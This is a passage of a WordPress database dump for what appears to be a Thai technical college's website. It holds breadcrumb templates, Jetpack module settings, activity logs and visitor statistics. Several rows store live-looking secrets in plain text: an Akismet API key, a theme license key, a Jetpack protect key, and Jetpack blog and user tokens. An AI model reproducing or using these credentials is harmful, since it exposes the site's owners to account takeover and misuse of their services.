archives.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:32:\"Htax_post_tag_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:25:\"Htax_post_format_template\";s:247:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to the %title% archives.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:35:\"Htax_post_format_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:16:\"Hauthor_template\";s:180:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Articles by: <a title=\"Go to the first page of posts by %title%.\" href=\"%link%\" class=\"%type%\">%htitle%</a>\";s:26:\"Hauthor_template_no_anchor\";s:155:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Articles by: %htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:12:\"Sauthor_name\";s:12:\"display_name\";s:22:\"Htax_category_template\";s:256:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to the %title% category archives.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:32:\"Htax_category_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:14:\"Hdate_template\";s:247:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to the %title% archives.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:24:\"Hdate_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";}', 'yes'),
(2166, 'bcn_options_bk', 'a:41:{s:17:\"bmainsite_display\";b:1;s:18:\"Hmainsite_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:28:\"Hmainsite_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:13:\"bhome_display\";b:1;s:14:\"Hhome_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:24:\"Hhome_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:13:\"bblog_display\";b:1;s:10:\"hseparator\";s:6:\" > \";s:12:\"blimit_title\";b:0;s:17:\"amax_title_length\";i:20;s:20:\"bcurrent_item_linked\";b:0;s:28:\"bpost_page_hierarchy_display\";b:1;s:25:\"Spost_page_hierarchy_type\";s:15:\"BCN_POST_PARENT\";s:19:\"Hpost_page_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:29:\"Hpost_page_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:15:\"apost_page_root\";s:3:\"160\";s:15:\"Hpaged_template\";s:147:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Page %htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:14:\"bpaged_display\";b:0;s:19:\"Hpost_post_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:29:\"Hpost_post_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:15:\"apost_post_root\";s:1:\"0\";s:28:\"bpost_post_hierarchy_display\";b:1;s:27:\"bpost_post_taxonomy_referer\";b:0;s:25:\"Spost_post_hierarchy_type\";s:8:\"category\";s:25:\"Hpost_attachment_template\";s:234:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to %title%.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:35:\"Hpost_attachment_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:13:\"H404_template\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:10:\"S404_title\";s:3:\"404\";s:16:\"Hsearch_template\";s:300:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Search results for '<a property=\"item\" typeof=\"WebPage\" title=\"Go to the first page of search results for %title%.\" href=\"%link%\" class=\"%type%\">%htitle%</a>'</span><meta property=\"position\" content=\"%position%\"></span>\";s:26:\"Hsearch_template_no_anchor\";s:171:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Search results for '%htitle%'</span><meta property=\"position\" content=\"%position%\"></span>\";s:22:\"Htax_post_tag_template\";s:251:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to the %title% tag archives.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:32:\"Htax_post_tag_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:25:\"Htax_post_format_template\";s:247:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to the %title% archives.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:35:\"Htax_post_format_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:16:\"Hauthor_template\";s:180:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Articles by: <a title=\"Go to the first page of posts by %title%.\" href=\"%link%\" class=\"%type%\">%htitle%</a>\";s:26:\"Hauthor_template_no_anchor\";s:155:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">Articles by: %htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:12:\"Sauthor_name\";s:12:\"display_name\";s:22:\"Htax_category_template\";s:256:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to the %title% category archives.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:32:\"Htax_category_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";s:14:\"Hdate_template\";s:247:\"<span property=\"itemListElement\" typeof=\"ListItem\"><a property=\"item\" typeof=\"WebPage\" title=\"Go to the %title% archives.\" href=\"%link%\" class=\"%type%\"><span property=\"name\">%htitle%</span></a><meta property=\"position\" content=\"%position%\"></span>\";s:24:\"Hdate_template_no_anchor\";s:142:\"<span property=\"itemListElement\" typeof=\"ListItem\"><span property=\"name\">%htitle%</span><meta property=\"position\" content=\"%position%\"></span>\";}', 'no'),
(2353, 'widget_akismet_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2356, 'akismet_strictness', '0', 'yes'),
(2357, 'akismet_show_user_comments_approved', '0', 'yes'),
(2358, 'wordpress_api_key', '83bceed7a2cb', 'yes'),
(2359, 'akismet_spam_count', '0', 'yes'),
(2362, 'university-hub-pro_license_key', '393926b7a0dd9d4bf7b5b42f3f2ec7f2', 'yes'),
(2372, 'university-hub-pro_license_key_status', 'expired', 'yes'),
(2501, 'jetpack_activated', '1', 'yes'),
(2504, 'jetpack_activation_source', 'a:2:{i:0;s:4:\"list\";i:1;N;}', 'yes'),
(2508, 'jetpack_available_modules', 'a:1:{s:5:\"6.4.3\";a:43:{s:18:\"after-the-deadline\";s:3:\"1.1\";s:8:\"carousel\";s:3:\"1.5\";s:13:\"comment-likes\";s:3:\"5.1\";s:8:\"comments\";s:3:\"1.4\";s:12:\"contact-form\";s:3:\"1.3\";s:20:\"custom-content-types\";s:3:\"3.1\";s:10:\"custom-css\";s:3:\"1.7\";s:21:\"enhanced-distribution\";s:3:\"1.2\";s:16:\"google-analytics\";s:3:\"4.5\";s:19:\"gravatar-hovercards\";s:3:\"1.1\";s:15:\"infinite-scroll\";s:3:\"2.0\";s:8:\"json-api\";s:3:\"1.9\";s:5:\"latex\";s:3:\"1.1\";s:11:\"lazy-images\";s:5:\"5.6.0\";s:5:\"likes\";s:3:\"2.2\";s:6:\"manage\";s:3:\"3.4\";s:8:\"markdown\";s:3:\"2.8\";s:9:\"masterbar\";s:3:\"4.8\";s:9:\"minileven\";s:3:\"1.8\";s:7:\"monitor\";s:3:\"2.6\";s:5:\"notes\";s:3:\"1.9\";s:6:\"photon\";s:3:\"2.0\";s:13:\"post-by-email\";s:3:\"2.0\";s:7:\"protect\";s:3:\"3.4\";s:9:\"publicize\";s:3:\"2.0\";s:3:\"pwa\";s:5:\"5.6.0\";s:13:\"related-posts\";s:3:\"2.9\";s:6:\"search\";s:3:\"5.0\";s:9:\"seo-tools\";s:3:\"4.4\";s:10:\"sharedaddy\";s:3:\"1.1\";s:10:\"shortcodes\";s:3:\"1.1\";s:10:\"shortlinks\";s:3:\"1.1\";s:8:\"sitemaps\";s:3:\"3.9\";s:3:\"sso\";s:3:\"2.6\";s:5:\"stats\";s:3:\"1.1\";s:13:\"subscriptions\";s:3:\"1.2\";s:13:\"tiled-gallery\";s:3:\"2.1\";s:10:\"vaultpress\";s:5:\"0:1.2\";s:18:\"verification-tools\";s:3:\"3.0\";s:10:\"videopress\";s:3:\"2.5\";s:17:\"widget-visibility\";s:3:\"2.4\";s:7:\"widgets\";s:3:\"1.2\";s:7:\"wordads\";s:5:\"4.5.0\";}}', 'yes'),
(2509, 'jetpack_options', 'a:12:{s:7:\"version\";s:16:\"6.4.3:1574498889\";s:11:\"old_version\";s:16:\"6.4.2:1534753451\";s:2:\"id\";i:140828573;s:6:\"public\";i:1;s:9:\"jumpstart\";s:19:\"jumpstart_activated\";s:14:\"last_heartbeat\";i:1575949452;s:22:\"image_widget_migration\";b:1;s:24:\"gallery_widget_migration\";b:1;s:24:\"custom_css_4.7_migration\";b:1;s:28:\"fallback_no_verify_ssl_certs\";i:0;s:9:\"time_diff\";i:0;s:11:\"master_user\";i:1;}', 'yes'),
(2511, 'do_activate', '0', 'yes'),
(2516, 'jetpack_log', 'a:15:{i:0;a:4:{s:4:\"time\";i:1515256592;s:7:\"user_id\";i:1;s:7:\"blog_id\";b:0;s:4:\"code\";s:8:\"register\";}i:1;a:5:{s:4:\"time\";i:1515256681;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:24:\"custom_css_4.7_migration\";s:4:\"data\";s:5:\"start\";}i:2;a:5:{s:4:\"time\";i:1515256708;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:8:\"carousel\";}i:3;a:5:{s:4:\"time\";i:1515256708;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:12:\"contact-form\";}i:4;a:5:{s:4:\"time\";i:1515256708;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:19:\"gravatar-hovercards\";}i:5;a:5:{s:4:\"time\";i:1515256708;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:5:\"likes\";}i:6;a:5:{s:4:\"time\";i:1515256708;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:7:\"monitor\";}i:7;a:5:{s:4:\"time\";i:1515256709;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:6:\"photon\";}i:8;a:5:{s:4:\"time\";i:1515256709;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:13:\"related-posts\";}i:9;a:5:{s:4:\"time\";i:1515256709;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:9:\"seo-tools\";}i:10;a:5:{s:4:\"time\";i:1515256709;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:10:\"sharedaddy\";}i:11;a:5:{s:4:\"time\";i:1515256709;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:3:\"sso\";}i:12;a:5:{s:4:\"time\";i:1515256709;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:13:\"subscriptions\";}i:13;a:5:{s:4:\"time\";i:1515256709;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"activate\";s:4:\"data\";s:13:\"tiled-gallery\";}i:14;a:4:{s:4:\"time\";i:1516153642;s:7:\"user_id\";i:1;s:7:\"blog_id\";i:140828573;s:4:\"code\";s:8:\"register\";}}', 'no'),
(2518, 'jetpack_private_options', 'a:2:{s:10:\"blog_token\";s:65:\"K%Y%extS!YLVB7eblRsab09c^4j#t685.TkUSspPA%6e@3XKjGo6*hpg$#GXeq1Ss\";s:11:\"user_tokens\";a:1:{i:1;s:67:\"6Xb00lyS4LAsd#8e)fh(A2A8!S8HwoSW.T1dLP0!7NlY88(P(no%#n78y(Ezj9K&F.1\";}}', 'yes'),
(2520, 'jetpack_unique_connection', 'a:3:{s:9:\"connected\";i:2;s:12:\"disconnected\";i:1;s:7:\"version\";s:5:\"3.6.1\";}', 'yes'),
(2554, 'jetpack_active_modules', 'a:29:{i:0;s:18:\"after-the-deadline\";i:1;s:12:\"contact-form\";i:2;s:20:\"custom-content-types\";i:3;s:10:\"custom-css\";i:4;s:21:\"enhanced-distribution\";i:5;s:19:\"gravatar-hovercards\";i:6;s:8:\"json-api\";i:7;s:5:\"latex\";i:8;s:6:\"manage\";i:9;s:5:\"notes\";i:10;s:13:\"post-by-email\";i:11;s:7:\"protect\";i:12;s:9:\"publicize\";i:13;s:10:\"sharedaddy\";i:14;s:10:\"shortcodes\";i:15;s:10:\"shortlinks\";i:16;s:8:\"sitemaps\";i:17;s:5:\"stats\";i:18;s:13:\"subscriptions\";i:19;s:18:\"verification-tools\";i:20;s:17:\"widget-visibility\";i:21;s:7:\"widgets\";i:22;s:8:\"carousel\";i:23;s:5:\"likes\";i:24;s:7:\"monitor\";i:25;s:6:\"photon\";i:26;s:13:\"related-posts\";i:28;s:3:\"sso\";i:29;s:13:\"tiled-gallery\";}', 'yes'),
(2568, 'jetpack_protect_key', 'd8f2fd6e07fff7e6c479ac502bdb9a97da3f771f', 'no'),
(2577, 'jetpack_sitemap_post_types', 'a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}', 'yes'),
(2598, 'jpsq_sync_checkout', '0:0', 'no'),
(2602, 'widget_blog_subscription', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2603, 'widget_authors', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2604, 'widget_eu_cookie_law_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2605, 'widget_facebook-likebox', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2606, 'widget_flickr', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2607, 'widget_wpcom-goodreads', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2608, 'widget_google_translate_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2609, 'widget_googleplus-badge', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2610, 'widget_grofile', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2611, 'widget_internet_defense_league_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2612, 'widget_widget_mailchimp_subscriber_popup', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2613, 'widget_milestone_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2614, 'widget_jetpack_my_community', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2615, 'widget_rss_links', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2616, 'widget_wpcom_social_media_icons_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2617, 'widget_twitter_timeline', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2618, 'widget_upcoming_events_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2619, 'widget_jetpack_display_posts_widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(2622, 'jetpack_portfolio', '0', 'yes'),
(2624, 'sharedaddy_disable_resources', '0', 'yes'),
(2625, 'jetpack_testimonial', '0', 'yes'),
(2669, 'jpsq_full_sync_checkout', '0:0', 'no'),
(2676, 'jetpack_active_plan', 'a:8:{s:10:\"product_id\";i:2002;s:12:\"product_slug\";s:12:\"jetpack_free\";s:18:\"product_name_short\";s:4:\"Free\";s:10:\"free_trial\";b:0;s:7:\"expired\";b:0;s:13:\"user_is_owner\";b:0;s:7:\"is_free\";b:1;s:8:\"features\";a:2:{s:6:\"active\";a:2:{i:0;s:7:\"akismet\";i:1;s:7:\"support\";}s:9:\"available\";a:9:{s:7:\"akismet\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:18:\"vaultpress-backups\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:25:\"vaultpress-backup-archive\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:24:\"vaultpress-storage-space\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:29:\"vaultpress-automated-restores\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:7:\"support\";a:6:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";}s:14:\"premium-themes\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:28:\"vaultpress-security-scanning\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:9:\"polldaddy\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}}}}', 'yes'),
(2692, 'stats_options', 'a:7:{s:9:\"admin_bar\";b:1;s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:11:\"count_roles\";a:0:{}s:7:\"blog_id\";i:140828573;s:12:\"do_not_track\";b:1;s:10:\"hide_smile\";b:1;s:7:\"version\";s:1:\"9\";}', 'yes'),
(2699, 'trusted_ip_header', 'O:8:\"stdClass\":3:{s:14:\"trusted_header\";s:20:\"HTTP_X_FORWARDED_FOR\";s:8:\"segments\";i:0;s:7:\"reverse\";b:0;}', 'no'),
(2702, 'jetpack_plugin_api_action_links', 'a:7:{s:19:\"akismet/akismet.php\";a:1:{s:8:\"Settings\";s:73:\"http://www.technicrayong.ac.th/wp-admin/admin.php?page=akismet-key-config\";}s:37:\"breadcrumb-navxt/breadcrumb-navxt.php\";a:1:{s:8:\"Settings\";s:81:\"http://www.technicrayong.ac.th/wp-admin/options-general.php?page=breadcrumb-navxt\";}s:19:\"jetpack/jetpack.php\";a:3:{s:7:\"Jetpack\";s:62:\"http://www.technicrayong.ac.th/wp-admin/admin.php?page=jetpack\";s:8:\"Settings\";s:72:\"http://www.technicrayong.ac.th/wp-admin/admin.php?page=jetpack#/settings\";s:7:\"Support\";s:71:\"http://www.technicrayong.ac.th/wp-admin/admin.php?page=jetpack-debugger\";}s:21:\"polylang/polylang.php\";a:1:{s:8:\"Settings\";s:60:\"http://www.technicrayong.ac.th/wp-admin/admin.php?page=mlang\";}s:27:\"popup-maker/popup-maker.php\";a:2:{s:8:\"Settings\";s:82:\"http://www.technicrayong.ac.th/wp-admin/edit.php?post_type=popup&page=pum-settings\";s:10:\"Extensions\";s:84:\"http://www.technicrayong.ac.th/wp-admin/edit.php?post_type=popup&page=pum-extensions\";}s:33:\"w3-total-cache/w3-total-cache.php\";a:2:{s:15:\"Premium Support\";s:67:\"http://www.technicrayong.ac.th/wp-admin/admin.php?page=w3tc_support\";s:8:\"Settings\";s:67:\"http://www.technicrayong.ac.th/wp-admin/admin.php?page=w3tc_general\";}s:24:\"wordpress-seo/wp-seo.php\";a:3:{s:3:\"FAQ\";s:150:\"https://yoa.st/1yc?php_version=5.3.29&platform=wordpress&platform_version=4.9.12&software=free&software_version=8.0&role=administrator&days_active=477\";s:15:\"Premium Support\";s:150:\"https://yoa.st/1yb?php_version=5.3.29&platform=wordpress&platform_version=4.9.12&software=free&software_version=8.0&role=administrator&days_active=477\";s:8:\"Settings\";s:70:\"http://www.technicrayong.ac.th/wp-admin/admin.php?page=wpseo_dashboard\";}}', 'yes'),
(2703, 'sharing-options', 'a:1:{s:6:\"global\";a:5:{s:12:\"button_style\";s:4:\"icon\";s:13:\"sharing_label\";s:11:\"Share this:\";s:10:\"open_links\";s:4:\"same\";s:4:\"show\";a:1:{i:0;s:4:\"post\";}s:6:\"custom\";a:0:{}}}', 'yes'),
(2705, 'post_by_email_address1', 'NULL', 'yes'),
(2706, 'monitor_receive_notifications', '1', 'yes'),
(2718, 'jetpack_restapi_stats_cache', 'a:1:{s:32:\"cd89f5a62d02fbbe503f55705d051af0\";a:1:{i:1525424620;O:8:\"stdClass\":3:{s:4:\"date\";s:10:\"2018-05-04\";s:5:\"stats\";O:8:\"stdClass\":22:{s:14:\"visitors_today\";i:256;s:18:\"visitors_yesterday\";i:418;s:8:\"visitors\";i:49713;s:11:\"views_today\";i:878;s:15:\"views_yesterday\";i:1679;s:14:\"views_best_day\";s:10:\"2018-03-14\";s:20:\"views_best_day_total\";i:10177;s:5:\"views\";i:238891;s:8:\"comments\";i:0;s:5:\"posts\";i:73;s:14:\"followers_blog\";i:0;s:18:\"followers_comments\";i:0;s:18:\"comments_per_month\";i:0;s:31:\"comments_most_active_recent_day\";s:0:\"\";s:25:\"comments_most_active_time\";s:3:\"N/A\";s:13:\"comments_spam\";i:0;s:10:\"categories\";i:13;s:4:\"tags\";i:0;s:6:\"shares\";i:0;s:14:\"shares_twitter\";i:0;s:20:\"shares_google-plus-1\";i:0;s:15:\"shares_facebook\";i:0;}s:6:\"visits\";O:8:\"stdClass\":3:{s:4:\"unit\";s:3:\"day\";s:6:\"fields\";a:3:{i:0;s:6:\"period\";i:1;s:5:\"views\";i:2;s:8:\"visitors\";}s:4:\"data\";a:30:{i:0;a:3:{i:0;s:10:\"2018-04-05\";i:1;i:1163;i:2;i:362;}i:1;a:3:{i:0;s:10:\"2018-04-06\";i:1;i:404;i:2;i:140;}i:2;a:3:{i:0;s:10:\"2018-04-07\";i:1;i:433;i:2;i:142;}i:3;a:3:{i:0;s:10:\"2018-04-08\";i:1;i:451;i:2;i:135;}i:4;a:3:{i:0;s:10:\"2018-04-09\";i:1;i:642;i:2;i:227;}i:5;a:3:{i:0;s:10:\"2018-04-10\";i:1;i:603;i:2;i:200;}i:6;a:3:{i:0;s:10:\"2018-04-11\";i:1;i:497;i:2;i:201;}i:7;a:3:{i:0;s:10:\"2018-04-12\";i:1;i:283;i:2;i:111;}i:8;a:3:{i:0;s:10:\"2018-04-13\";i:1;i:183;i:2;i:64;}i:9;a:3:{i:0;s:10:\"2018-04-14\";i:1;i:226;i:2;i:67;}i:10;a:3:{i:0;s:10:\"2018-04-15\";i:1;i:187;i:2;i:75;}i:11;a:3:{i:0;s:10:\"2018-04-16\";i:1;i:387;i:2;i:117;}i:12;a:3:{i:0;s:10:\"2018-04-17\";i:1;i:575;i:2;i:180;}i:13;a:3:{i:0;s:10:\"2018-04-18\";i:1;i:718;i:2;i:224;}i:14;a:3:{i:0;s:10:\"2018-04-19\";i:1;i:632;i:2;i:214;}i:15;a:3:{i:0;s:10:\"2018-04-20\";i:1;i:808;i:2;i:233;}i:16;a:3:{i:0;s:10:\"2018-04-21\";i:1;i:308;i:2;i:107;}i:17;a:3:{i:0;s:10:\"2018-04-22\";i:1;i:474;i:2;i:153;}i:18;a:3:{i:0;s:10:\"2018-04-23\";i:1;i:993;i:2;i:295;}i:19;a:3:{i:0;s:10:\"2018-04-24\";i:1;i:1172;i:2;i:311;}i:20;a:3:{i:0;s:10:\"2018-04-25\";i:1;i:995;i:2;i:278;}i:21;a:3:{i:0;s:10:\"2018-04-26\";i:1;i:2092;i:2;i:496;}i:22;a:3:{i:0;s:10:\"2018-04-27\";i:1;i:1432;i:2;i:393;}i:23;a:3:{i:0;s:10:\"2018-04-28\";i:1;i:931;i:2;i:270;}i:24;a:3:{i:0;s:10:\"2018-04-29\";i:1;i:827;i:2;i:239;}i:25;a:3:{i:0;s:10:\"2018-04-30\";i:1;i:1533;i:2;i:404;}i:26;a:3:{i:0;s:10:\"2018-05-01\";i:1;i:812;i:2;i:278;}i:27;a:3:{i:0;s:10:\"2018-05-02\";i:1;i:1527;i:2;i:384;}i:28;a:3:{i:0;s:10:\"2018-05-03\";i:1;i:1679;i:2;i:418;}i:29;a:3:{i:0;s:10:\"2018-05-04\";i:1;i:878;i:2;i:256;}}}}}}', 'no'),
(2725, 'social_notifications_like', 'on', 'yes'),
(2740, 'sharing-services', 'a:2:{s:7:\"visible\";a:3:{i:0;s:7:\"twitter\";i:1;s:8:\"facebook\";i:2;s:13:\"google-plus-1\";}s:6:\"hidden\";a:0:{}}', 'yes'),
(2808, 'dismiss_empty_stats_card', '1', 'yes'),
(2892, 'gravatar_disable_hovercards', 'disabled', 'yes'),
(2896, 'stats_cache', 'a:2:{s:32:\"7a5a401e3be08e20a4a657a8c41283dd\";a:1:{i:1575949506;a:8:{i:0;a:4:{s:7:\"post_id\";s:3:\"160\";s:10:\"post_title\";s:0:\"\";s:14:\"post_permalink\";s:31:\"http://www.technicrayong.ac.th/\";s:5:\"views\";s:2:\"17\";}i:1;a:4:{s:7:\"post_id\";s:4:\"1545\";s:10:\"post_title\";s:24:\"งานพัสดุ\";s:14:\"post_permalink\";s:104:\"http://www.technicrayong.ac.th/%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%aa%e0%b8%94%e0%b8%b8/\";s:5:\"views\";s:1:\"3\";}i:2;a:4:{s:7:\"post_id\";s:1:\"0\";s:10:\"post_title\";s:9:\"Home 